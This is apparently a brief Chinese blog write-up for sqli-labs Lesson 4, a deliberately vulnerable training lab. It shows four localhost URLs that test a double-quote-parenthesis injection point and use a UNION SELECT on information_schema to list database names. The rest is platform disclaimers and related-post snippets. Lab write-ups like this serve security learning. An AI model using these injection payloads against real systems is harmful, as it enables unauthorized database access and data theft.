http://127.0.0.1/Less-4/?id=1
http://127.0.0.1/Less-4/?id=1%22
http://127.0.0.1/Less-4/?id=0%22)%20union%20select%201,2,3--+
http://127.0.0.1/Less-4/?id=0%22)%20union%20select%201,group_concat(schema_name),2%20from%20information_schema.schemata--+
[sqli-labs]Less-4(明注 , Bool盲注 , 時間盲注 , 報錯注入)
最后編輯于 :
?著作權歸作者所有,轉載或內容合作請聯系作者
平臺聲明:文章內容(如有圖片或視頻亦包括在內)由作者上傳并發布,文章內容僅代表作者本人觀點,簡書系信息發布平臺,僅提供信息存儲服務。
平臺聲明:文章內容(如有圖片或視頻亦包括在內)由作者上傳并發布,文章內容僅代表作者本人觀點,簡書系信息發布平臺,僅提供信息存儲服務。
推薦閱讀更多精彩內容
- 打開主頁進入第一關 : 提示傳入id這個參數 發現這個頁面會根據傳入的ID查詢到對應的用戶這里我們可以通過查看數據...
- 這道題發現頁面中會顯示出GET過去的參數不過好像沒有URL解碼...好奇怪 , 感覺好像是傳過去之后又被編碼了 ,...
